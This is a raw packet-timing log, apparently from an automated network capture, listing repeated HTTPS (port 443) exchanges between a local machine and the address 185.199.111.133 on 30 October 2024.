                                                                                                                                                                              Oct 30, 2024 11:29:06.918585062 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.918649912 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.919080973 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919094086 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919166088 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.919179916 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919236898 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.919507027 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919519901 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919588089 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.919600964 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919657946 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.919943094 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.919955969 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920022011 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.920033932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920089006 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.920387983 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920402050 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920471907 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.920485020 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920561075 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.920829058 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920842886 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920921087 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.920933008 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.920979977 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.922295094 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.922307968 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.922374010 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.922385931 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.922435045 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.922725916 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.922739029 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.922806978 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.922820091 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.922873020 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.923099995 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.923113108 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.923177958 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.923191071 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.923243046 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.923652887 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.923666954 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.923737049 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.923768044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.923877954 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.924036026 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924071074 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924103975 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.924118996 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924148083 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.924401999 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924416065 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924483061 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.924496889 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924890995 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924904108 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.924971104 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.924987078 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.925276041 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.925288916 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.925354004 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.925381899 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.925621033 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.925632954 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.925694942 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.925709009 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.926009893 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.926023006 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.926069975 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.926084042 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.926112890 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.952763081 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.952784061 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.952915907 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.952931881 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953172922 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953214884 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953243971 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.953263044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953286886 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.953560114 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953596115 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953628063 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.953646898 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953679085 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.953943968 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.953994036 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954004049 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.954030037 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954049110 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.954372883 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954406977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954430103 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.954442024 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954467058 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.954683065 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954718113 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954745054 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.954756975 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.954773903 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.966487885 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.966502905 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.966630936 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.966645956 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.967021942 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.967036009 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.967200994 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.967200994 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.967216969 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.968949080 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.968961000 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.969041109 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.969055891 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.994798899 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.994811058 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.994911909 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.994925976 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.999440908 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.999454975 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.999509096 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:06.999528885 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:06.999552011 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.001235962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.001249075 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.001316071 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.001343012 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.001750946 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.001777887 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.001831055 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.001848936 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.001871109 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.002175093 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.002187967 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.002239943 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.002252102 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.032988071 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.032999992 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.033190012 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.033205032 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.037801027 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.037813902 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.037874937 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.037888050 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.037914038 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.038327932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.038350105 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.038402081 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.038414955 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.038455009 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.038678885 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.038691044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.038746119 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.038758993 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039063931 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039076090 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039125919 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.039138079 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039161921 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.039585114 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039602995 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039640903 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.039654016 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.039678097 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.040014982 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.040029049 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.040077925 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.040097952 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.040118933 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.040817976 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.040829897 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.040880919 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.040899992 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.040920973 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.041379929 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.041393042 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.041445017 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.041459084 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.041961908 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.041974068 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042041063 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042053938 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042298079 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042310953 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042356968 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042371988 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042393923 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042422056 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042434931 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042474031 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042484999 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042510033 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042546034 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042561054 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042603970 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042622089 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042649031 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.042927980 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042941093 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.042999029 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.043013096 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043458939 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043472052 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043528080 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.043541908 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043668985 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043682098 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043740988 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.043756962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.043781996 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.069737911 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.069752932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.069824934 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.069845915 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.069869041 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.071331024 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.071342945 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.071415901 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.071429968 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072020054 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072031975 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072088957 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.072102070 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072237968 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072251081 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072303057 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.072315931 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072664976 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072676897 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072719097 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.072731972 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072756052 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.072886944 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072899103 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072945118 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.072962046 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.072999954 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.073237896 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.073250055 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.073298931 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.073312998 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.085072041 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.085113049 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.085135937 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.085149050 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.085174084 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.085671902 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.085692883 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.085752010 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.085752010 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.085767984 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.087086916 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.087100029 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.087156057 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.087168932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119075060 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119090080 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119138956 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.119174957 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119200945 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.119582891 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119596004 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119640112 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.119652033 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119678974 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.119940996 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119955063 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.119997025 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.120014906 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.120035887 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.120798111 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.120810986 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.120857000 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.120873928 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.120894909 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.121226072 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.121238947 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.121282101 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.121293068 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.121315956 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.121711016 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.121743917 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.121789932 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.121805906 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.121826887 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.156297922 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.156315088 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.156377077 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.156400919 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.156429052 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.156780005 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.156793118 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.156846046 CET49705443192.168.2.5185.199.111.133
